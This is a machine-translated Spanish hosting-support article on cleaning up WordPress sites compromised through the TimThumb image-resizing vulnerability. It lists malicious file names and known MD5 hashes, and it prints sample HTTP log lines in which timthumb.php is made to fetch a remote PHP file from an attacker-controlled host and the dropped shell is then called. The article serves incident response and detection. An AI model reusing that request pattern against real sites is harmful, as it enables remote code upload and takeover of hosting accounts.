Bup bip bop… iniciando secuencia 42…
¡Llegaron los robots! Han tomado el control y tradujeron esta página a tu idioma local. Sus corazoncitos de metal solo tienen las mejores intenciones. ¡Quieren ayudar! Dinos si están haciendo un buen trabajo con los botones al final de la página. Ve a la versión en inglés

Compromiso de WordPress: TimThumb

TimThumb es una herramienta utilizada por WordPress themes y plugins para cambiar el tamaño de las imágenes. Las versiones anteriores de TimThumb tienen una vulnerabilidad de seguridad que permite a los atacantes cargar ("malos") archivos malintencionados desde otro sitio Web. El primer archivo incorrecto, a continuación, permite al atacante cargar más archivos malintencionados en la cuenta de hospedaje.

Puede obtener más información sobre los peligros y cómo tratar con ellos en ¿Qué sucede si mi sitio Web es un ataque pirata?.

Signos que ha puesto en peligro

Además de los signos mencionados en ¿Qué sucede si mi sitio Web es un ataque pirata?, puede indicar a su sitio se ha visto afectada por este compromiso específico si su cuenta contiene los archivos con los modelos siguientes en un directorio de plugin:

  • EXTERNAL_ [hash md5] .php, por ejemplo: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [valor hash md5] .php, por ejemplo: 7eebe45bde5168488ac4010f0d65cea8.php

Puede encontrar ejemplos de hashes md5 posibles en la sección MD5SUMS de conocidos archivos malintencionados de este artículo.

También puede encontrar los siguientes archivos en el directorio de raíz de su sitio Web (más información):

  • x.txt
  • logx.txt

Remedios

Debe quitar todos los archivos comprometidos y malos. Antes de borrar nada, se recomienda realizar una copia de seguridad del sitio Web (más información).

Localizar archivos erróneos

Los archivos mal que inicialmente se cargan a través de la vulnerabilidad de TimThumb normalmente se encuentran en uno de los directorios siguientes, que se encuentran en la /theme o /plugin el directorio que contiene el archivo TimThumb vulnerable.

  • / tmp
  • / Cache
  • / images

Ejemplos de ubicaciones de archivos incorrectos:

[webroot] / wp-content/themes / [tema con TimThumb vulnerable] / caché/imágenes /

Ejemplos de nombres incorrectos de los archivos en estas ubicaciones:

  • ef881b33fba49bd6ad1818062d071a9c.PHP
  • db648d44074f33a8857066b97290d247.PHP
  • 3cf739debc9340540c923bbf3b73044b.PHP
  • dc33a2e36d3179a06278191088c2ef35.PHP
  • 8377cb73d30655dc2cbf906c9310da56.PHP
  • eb117b212e2906f52c0a0c9132c6c07a.PHP
  • a4924ec23939d2410354efbb8d4ddd06.PHP
  • vvv3.PHP
  • ea90e1e4d7ba30848f70b13d616c6ed4.PHP
  • 236268f2a06e4153365b998d13934eb9.PHP
  • 6a4fa516943e2fa09e3704486075de9f.PHP
  • 896c4eb4ff2581f6e623db1904b80a44.PHP
  • wp-images.php

Los archivos x.txt y logx.txt contienen información acerca de cuando se creó un archivo erróneo utilizando la vulnerabilidad TimThumb y la ubicación del archivo erróneo dentro de la cuenta de hospedaje. Esta información es útil para determinar qué archivos se deben quitarse y dónde encontrarlos. Sin embargo, es no probable que esto proporcionará una lista completa de archivos que deben quitarse.

Un ejemplo:

Day : Thu, 11 Apr 2013 06:21:15 -0700
IP: X.X.X.X
Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Url: /wp-content/themes/[theme with vulnerable TimThumb]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

Para quitar los archivos

Después ha creado una copia de seguridad de su sitio, quite los archivos siguientes:

  • x.txt
  • logx.txt
  • EXTERNAL_ [hash md5] .php, por ejemplo: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [valor hash md5] .php, por ejemplo: 7eebe45bde5168488ac4010f0d65cea8.php
  • Encontraron otros archivos maliciosos de PHP con el hash md5 con el nombre de los archivos.

Puede hacerlo a través de FTP (más info) o mediante el Administrador de archivos en el panel de control para su cuenta de hospedaje (más información).

También debe:

  • Actualizar todos los temas y plugins a la última versión.
  • Reemplazar cualquier instancia de TimThumb.php con la versión más reciente, visiteaquí.

Información técnica

Ejemplo de registros HTTP

x.x.x.x--[27/Abr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/ [tema con TimThumb vulnerable] /framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer o 4.0b1 (Windows 95)"
x.x.x.s--[27/Abr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/ [tema con TimThumb vulnerable] /cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer o 4.0b1 (Windows 95)"
x.x.x.x--[27/Abr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 36841 404 "-" "Microsoft Internet Explorer o 4.0b1 (Windows 95)"
x.x.x.x--[27/Abr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/ [tema con TimThumb vulnerable] /cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer o 4.0b1 (Windows 95)"
x.x.x.x--[27/Abr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/ [tema con TimThumb vulnerable] /cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer o 4.0b1 (Windows 95)"

MD5SUMS de archivos malintencionados conocidos

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

Archivos maliciosos adicionales

  • wp-script.php
  • wp-images.php
  • vvv3.PHP
  • Data.PHP

¿Este artículo fue útil?
Gracias por tus comentarios
¡Nos complace haber ayudado! ¿Hay algo más que podamos hacer por ti?
Lo sentimos. ¿Cómo podríamos ser de más utilidad?